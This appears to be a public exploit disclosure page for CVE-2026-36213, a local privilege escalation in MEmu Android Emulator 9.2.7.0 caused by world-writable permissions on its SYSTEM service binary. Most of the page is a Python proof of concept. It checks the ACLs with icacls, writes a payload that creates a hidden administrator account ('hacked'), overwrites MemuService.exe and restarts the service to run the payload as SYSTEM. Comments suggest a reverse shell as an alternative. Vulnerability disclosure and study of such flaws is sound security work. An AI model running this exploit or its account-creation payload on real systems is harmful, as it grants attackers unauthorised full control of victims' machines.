| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2026-36213 | 11 Jun 202615:00 | – | circl | |
| CVE-2026-36213 | 15 Jun 202600:00 | – | cve | |
| CVE-2026-36213 | 15 Jun 202600:00 | – | cvelist | |
| EUVD-2026-36745 | 15 Jun 202621:30 | – | euvd | |
| CVE-2026-36213 | 15 Jun 202620:16 | – | nvd | |
| 📄 MEmu Android Emulator 9.2.7.0 Privilege Escalation | 11 Jun 202600:00 | – | packetstorm | |
| PT-2026-49285 | 15 Jun 202600:00 | – | ptsecurity | |
| CVE-2026-36213 | 15 Jun 202600:00 | – | vulnrichment |
# Exploit Title: MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation
# Google Dork: N/A
# Date: 2026-06-16
# Exploit Author: Mohammad
# Vendor Homepage: https://www.memuplay.com
# Software Link: https://www.memuplay.com/download.html
# Version: 9.2.7.0
# Tested on: Windows 10 x64 / Windows 11 x64
# CVE: CVE-2026-36213
###############################################
# Vulnerability Description
###############################################
#
# MEmu Android Emulator 9.2.7.0 installs a Windows
# service named "MEmuSVC" that runs with
# NT AUTHORITY\SYSTEM (LocalSystem) privileges.
#
# The service binary located at:
# C:\Program Files\Microvirt\MEmu\MemuService.exe
#
# is installed with insecure NTFS permissions,
# granting FullControl (F) to low-privileged groups:
# - BUILTIN\Users
# - Everyone
#
# A low-privileged local user can replace the service
# binary with a malicious executable.
# Upon service restart, the malicious binary executes
# with NT AUTHORITY\SYSTEM privileges.
#
# Vulnerability Type : Incorrect Access Control
# CWE : CWE-732 (Incorrect Permission
# Assignment for Critical Resource)
# CVSS v3.1 Score : 7.8 HIGH
# CVSS Vector : AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
#
###############################################
# Verification - Check Permissions
###############################################
#
# Run the following command to verify vulnerability:
#
# icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
#
# Vulnerable output:
# C:\Program Files\Microvirt\MEmu\MemuService.exe
# BUILTIN\Users:(F)
# Everyone:(F)
# NT AUTHORITY\SYSTEM:(F)
# BUILTIN\Administrators:(F)
#
###############################################
# Proof of Concept
###############################################
import os
import sys
import shutil
import subprocess
import ctypes
# -----------------------------------------------
# Step 1: Check if running as low-privileged user
# -----------------------------------------------
def is_admin():
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
# -----------------------------------------------
# Step 2: Verify vulnerable permissions on binary
# -----------------------------------------------
def check_permissions(target_path):
print("[*] Checking permissions on service binary...")
print(f"[*] Target: {target_path}\n")
result = subprocess.run(
["icacls", target_path],
capture_output=True,
text=True
)
output = result.stdout
print(output)
# Check for vulnerable permissions
vulnerable = False
dangerous_groups = ["BUILTIN\\Users", "Everyone"]
for group in dangerous_groups:
if group in output and "(F)" in output:
print(f"[!] VULNERABLE: {group} has FullControl (F)")
vulnerable = True
return vulnerable
# -----------------------------------------------
# Step 3: Create malicious payload
# (در محیط واقعی اینجا payload قرار میگیره)
# -----------------------------------------------
def create_payload(payload_path):
print("\n[*] Creating malicious payload...")
# این یه نمونه سادهست
# در محیط واقعی اینجا کد مخرب قرار میگیره
# مثلاً reverse shell یا user creation
payload_code = '''
import os
# Example: Add new admin user
os.system("net user hacked Password123! /add")
os.system("net localgroup administrators hacked /add")
print("[+] Payload executed as NT AUTHORITY\\SYSTEM")
'''
# کامپایل یا آمادهسازی payload
with open(payload_path, "w") as f:
f.write(payload_code)
print(f"[+] Payload created at: {payload_path}")
# -----------------------------------------------
# Step 4: Replace legitimate binary with payload
# -----------------------------------------------
def replace_binary(target_path, payload_path):
print("\n[*] Replacing service binary...")
# Backup original binary
backup_path = target_path + ".bak"
try:
shutil.copy2(target_path, backup_path)
print(f"[+] Original backed up to: {backup_path}")
shutil.copy2(payload_path, target_path)
print(f"[+] Binary replaced successfully!")
return True
except PermissionError:
print("[-] Permission denied - Not vulnerable")
return False
except Exception as e:
print(f"[-] Error: {e}")
return False
# -----------------------------------------------
# Step 5: Restart service to trigger execution
# -----------------------------------------------
def restart_service(service_name):
print(f"\n[*] Restarting service: {service_name}")
try:
subprocess.run(
["sc", "stop", service_name],
capture_output=True
)
print(f"[+] Service stopped")
import time
time.sleep(2)
subprocess.run(
["sc", "start", service_name],
capture_output=True
)
print(f"[+] Service started")
print(f"[+] Payload should now execute as SYSTEM!")
return True
except Exception as e:
print(f"[-] Error restarting service: {e}")
return False
# -----------------------------------------------
# Main Exploit Flow
# -----------------------------------------------
def main():
print("=" * 55)
print(" CVE-2026-36213 - MEmu LPE PoC")
print(" MEmu Android Emulator 9.2.7.0")
print(" Researcher: Mohammad")
print("=" * 55)
# Config
TARGET_SERVICE = "MEmuSVC"
TARGET_BINARY = (
r"C:\Program Files\Microvirt\MEmu\MemuService.exe"
)
PAYLOAD_PATH = r"C:\Temp\payload.exe"
# Check not running as admin
if is_admin():
print("[!] Run this as a LOW-PRIVILEGED user!")
print("[!] This PoC demonstrates LPE")
sys.exit(1)
print(f"[*] Running as: {os.getenv('USERNAME')}")
print(f"[*] Admin : {is_admin()} (should be False)\n")
# Step 1: Verify vulnerability
if not check_permissions(TARGET_BINARY):
print("\n[-] Target does not appear vulnerable")
print("[-] Permissions may have been fixed")
sys.exit(0)
print("\n[+] Target is VULNERABLE!")
# Step 2: Create payload
create_payload(PAYLOAD_PATH)
# Step 3: Replace binary
if not replace_binary(TARGET_BINARY, PAYLOAD_PATH):
print("\n[-] Exploit failed at binary replacement")
sys.exit(1)
# Step 4: Trigger execution
restart_service(TARGET_SERVICE)
print("\n[+] Exploit completed!")
print("[+] Check if payload executed successfully")
print("=" * 55)
if __name__ == "__main__":
main()
###############################################
# Detection Script
###############################################
#
# Automated detection tool available at:
# https://github.com/sec-zone/Hijack-service-binaries
#
###############################################
# Disclosure Timeline
###############################################
#
# 2026-02-20 → Vulnerability discovered
# 2026-02-20 → CVE-2026-36213 assigned by MITRE
# 2026-06-11 → Vendor (Microvirt) notified
# 2026-06-16 → Public disclosure
#
###############################################
# References
###############################################
#
# [1] CWE-732: Incorrect Permission Assignment
# https://cwe.mitre.org/data/definitions/732.html
#
# [2] CVE-2026-36213
# https://www.cve.org/CVERecord?id=CVE-2026-36213
#
# [3] Detection Script
# https://github.com/sec-zone/Hijack-service-binaries
#
###############################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation